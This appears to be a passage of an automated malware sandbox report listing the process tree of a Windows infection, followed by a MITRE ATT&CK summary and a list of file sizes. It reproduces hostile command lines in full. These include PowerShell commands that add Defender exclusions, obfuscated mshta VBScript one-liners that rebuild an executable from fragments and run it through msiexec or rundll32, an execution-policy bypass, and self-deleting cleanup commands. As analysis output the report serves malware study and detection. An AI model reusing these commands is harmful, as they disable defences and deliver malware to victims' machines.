C:\Users\Admin\Pictures\Adobe Films\7sju9znCXIWb_JmA7pnUr08O.exe"7sju9znCXIWb_JmA7pnUr08O.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\7sju9znCXIWb_JmA7pnUr08O.exe"7sju9znCXIWb_JmA7pnUr08O.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\7sju9znCXIWb_JmA7pnUr08O.exe"7sju9znCXIWb_JmA7pnUr08O.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 1448⤵
- Program crash
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\CnwQgaUz8S8n79MlHuM3IWQv.exe"C:\Users\Admin\Pictures\Adobe Films\CnwQgaUz8S8n79MlHuM3IWQv.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\u9_QJqr4yg7IkHzdpnHv8O1h.exe"C:\Users\Admin\Pictures\Adobe Films\u9_QJqr4yg7IkHzdpnHv8O1h.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\u9_QJqr4yg7IkHzdpnHv8O1h.exe"C:\Users\Admin\Pictures\Adobe Films\u9_QJqr4yg7IkHzdpnHv8O1h.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\55iHOA3DvaroPE2rrVqLUJiX.exe"C:\Users\Admin\Pictures\Adobe Films\55iHOA3DvaroPE2rrVqLUJiX.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\332f07d2-8d86-4046-a733-4064f7706e08\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\332f07d2-8d86-4046-a733-4064f7706e08\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\332f07d2-8d86-4046-a733-4064f7706e08\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run7⤵
-
C:\Users\Admin\AppData\Local\Temp\332f07d2-8d86-4046-a733-4064f7706e08\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\332f07d2-8d86-4046-a733-4064f7706e08\AdvancedRun.exe" /SpecialRun 4101d8 51048⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\55iHOA3DvaroPE2rrVqLUJiX.exe" -Force7⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\55iHOA3DvaroPE2rrVqLUJiX.exe" -Force7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\55iHOA3DvaroPE2rrVqLUJiX.exe"C:\Users\Admin\Pictures\Adobe Films\55iHOA3DvaroPE2rrVqLUJiX.exe"7⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5172 -s 21167⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rV16q1YPVhNWv2Xw_wHZIRB5.exe"C:\Users\Admin\Pictures\Adobe Films\rV16q1YPVhNWv2Xw_wHZIRB5.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\yMqJOU4GkTaE_oFGucqvACYk.exe"C:\Users\Admin\Pictures\Adobe Films\yMqJOU4GkTaE_oFGucqvACYk.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\h4tBNwBxQiWLtk8sxZOQx27X.exe"C:\Users\Admin\Pictures\Adobe Films\h4tBNwBxQiWLtk8sxZOQx27X.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\7RLJUl3vyC5MIF4YYADZ6S4Z.exe"C:\Users\Admin\Pictures\Adobe Films\7RLJUl3vyC5MIF4YYADZ6S4Z.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\7RLJUl3vyC5MIF4YYADZ6S4Z.exe"C:\Users\Admin\Pictures\Adobe Films\7RLJUl3vyC5MIF4YYADZ6S4Z.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\e_xXqjOHlcjfHUvzECU_TNt8.exe"C:\Users\Admin\Pictures\Adobe Films\e_xXqjOHlcjfHUvzECU_TNt8.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\WYXnfO2BEjHCEfCon6WlprQX.exe"C:\Users\Admin\Pictures\Adobe Films\WYXnfO2BEjHCEfCon6WlprQX.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "WYXnfO2BEjHCEfCon6WlprQX.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\WYXnfO2BEjHCEfCon6WlprQX.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "WYXnfO2BEjHCEfCon6WlprQX.exe" /f8⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\d0XiFBva5HAR92zpaj4HITEU.exe"C:\Users\Admin\Pictures\Adobe Films\d0XiFBva5HAR92zpaj4HITEU.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lLYslOejhtXgqf8bayF_maUW.exe"C:\Users\Admin\Pictures\Adobe Films\lLYslOejhtXgqf8bayF_maUW.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\KFPcGgJ_lzPiMhBkkksUvxS8.exe"C:\Users\Admin\Pictures\Adobe Films\KFPcGgJ_lzPiMhBkkksUvxS8.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Pictures\Adobe Films\KFPcGgJ_lzPiMhBkkksUvxS8.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\nGZvvlhtxMJX3fHMXGDG7RUJ.exe"C:\Users\Admin\Pictures\Adobe Films\nGZvvlhtxMJX3fHMXGDG7RUJ.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\obcPlOcCxtvezRdtqJgVgDmz.exe"C:\Users\Admin\Pictures\Adobe Films\obcPlOcCxtvezRdtqJgVgDmz.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\j4bu0_hU4ojJiiVYKVnO09gN.exe"C:\Users\Admin\Pictures\Adobe Films\j4bu0_hU4ojJiiVYKVnO09gN.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\L7n7bPzUheCAgeS1hVnzSUKM.exe"C:\Users\Admin\Pictures\Adobe Films\L7n7bPzUheCAgeS1hVnzSUKM.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\5eTlbEHaMuU0g4rrGDkLXHwP.exe"C:\Users\Admin\Pictures\Adobe Films\5eTlbEHaMuU0g4rrGDkLXHwP.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\5eTlbEHaMuU0g4rrGDkLXHwP.exe"C:\Users\Admin\Pictures\Adobe Films\5eTlbEHaMuU0g4rrGDkLXHwP.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\5eTlbEHaMuU0g4rrGDkLXHwP.exe"C:\Users\Admin\Pictures\Adobe Films\5eTlbEHaMuU0g4rrGDkLXHwP.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mM4ZFXjepgjUOmYTeUHCXB1q.exe"C:\Users\Admin\Pictures\Adobe Films\mM4ZFXjepgjUOmYTeUHCXB1q.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1069175.scr"C:\Users\Admin\AppData\Roaming\1069175.scr" /S7⤵
-
-
C:\Users\Admin\AppData\Roaming\5117125.scr"C:\Users\Admin\AppData\Roaming\5117125.scr" /S7⤵
-
-
C:\Users\Admin\AppData\Roaming\1471048.scr"C:\Users\Admin\AppData\Roaming\1471048.scr" /S7⤵
-
-
C:\Users\Admin\AppData\Roaming\8022933.scr"C:\Users\Admin\AppData\Roaming\8022933.scr" /S7⤵
-
-
C:\Users\Admin\AppData\Roaming\7106892.scr"C:\Users\Admin\AppData\Roaming\7106892.scr" /S7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\74i11n2FnXRSuQejdkCzDilT.exe"C:\Users\Admin\Pictures\Adobe Films\74i11n2FnXRSuQejdkCzDilT.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\74i11n2FnXRSuQejdkCzDilT.exe"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\74i11n2FnXRSuQejdkCzDilT.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\74i11n2FnXRSuQejdkCzDilT.exe" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\74i11n2FnXRSuQejdkCzDilT.exe" ) do taskkill -iM "%~NXI" -f8⤵
-
C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu029⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF ""-PMDrnm85Xpfala4uMu02"" == """" for %I iN ( ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "-PMDrnm85Xpfala4uMu02" == "" for %I iN ( "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ) do taskkill -iM "%~NXI" -f11⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScripT: clOse ( cREaTeObJECT ( "wscRIPt.SHELL" ). rUN ( "cMd /q /R Echo | SeT /P = ""MZ"" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3 + n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l " , 0 , trUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R Echo | SeT /P = "MZ" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3+ n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "12⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>9Ym~JXRX.Lb3"12⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /Y ..\bjUC.l12⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "74i11n2FnXRSuQejdkCzDilT.exe" -f9⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\viuBaC_RPD1BoBwJpxmES_Lj.exe"C:\Users\Admin\Pictures\Adobe Films\viuBaC_RPD1BoBwJpxmES_Lj.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\fXT2DYRIPHdhxLz30m6OVyTF.exe"C:\Users\Admin\Pictures\Adobe Films\fXT2DYRIPHdhxLz30m6OVyTF.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--N3tIj0CCa"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1c4,0x1e8,0x7fff0b6adec0,0x7fff0b6aded0,0x7fff0b6adee09⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,17129670447789934336,3388639779550170788,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6396_392616374" --mojo-platform-channel-handle=1680 /prefetch:89⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1496,17129670447789934336,3388639779550170788,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6396_392616374" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1524 /prefetch:29⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1496,17129670447789934336,3388639779550170788,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6396_392616374" --mojo-platform-channel-handle=2236 /prefetch:89⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1496,17129670447789934336,3388639779550170788,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6396_392616374" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2564 /prefetch:19⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1496,17129670447789934336,3388639779550170788,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6396_392616374" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2572 /prefetch:19⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1496,17129670447789934336,3388639779550170788,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6396_392616374" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3200 /prefetch:29⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,17129670447789934336,3388639779550170788,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6396_392616374" --mojo-platform-channel-handle=1892 /prefetch:89⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,17129670447789934336,3388639779550170788,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6396_392616374" --mojo-platform-channel-handle=3284 /prefetch:89⤵
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon203f01ac7e6.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon203f01ac7e6.exeMon203f01ac7e6.exe5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon203f01ac7e6.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon203f01ac7e6.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon203f01ac7e6.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon203f01ac7e6.exe" ) do taskkill /F -Im "%~NxU"7⤵
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"10⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I14⤵
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Mon203f01ac7e6.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20b6f9d5bd03a305.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon20b6f9d5bd03a305.exeMon20b6f9d5bd03a305.exe5⤵
- Executes dropped EXE
-
-
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7DD2.exeC:\Users\Admin\AppData\Local\Temp\7DD2.exe1⤵
-
C:\Users\Admin\AppData\Roaming\eaieagrC:\Users\Admin\AppData\Roaming\eaieagr1⤵
-
C:\Users\Admin\AppData\Roaming\buieagrC:\Users\Admin\AppData\Roaming\buieagr1⤵
-
C:\Windows\system32\WerFault.exe"C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20211012-2029.dm1⤵
-
C:\Users\Admin\AppData\Local\Temp\A82B.exeC:\Users\Admin\AppData\Local\Temp\A82B.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\BC51.exeC:\Users\Admin\AppData\Local\Temp\BC51.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\CFDA.exeC:\Users\Admin\AppData\Local\Temp\CFDA.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\E576.exeC:\Users\Admin\AppData\Local\Temp\E576.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\1263.exeC:\Users\Admin\AppData\Local\Temp\1263.exe1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1ov2qtki\1ov2qtki.cmdline"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES37C3.tmp" "c:\Users\Admin\AppData\Local\Temp\1ov2qtki\CSC875741AAF4484803AE6A49F3E56129.TMP"4⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\25DC.exeC:\Users\Admin\AppData\Local\Temp\25DC.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\25DC.exeC:\Users\Admin\AppData\Local\Temp\25DC.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5A7A.exeC:\Users\Admin\AppData\Local\Temp\5A7A.exe1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6DE1AC387A682772E052D8F0E0558708 C2⤵
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1Modify Registry
2Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
152KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
136KB
-
Filesize
6.0MB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
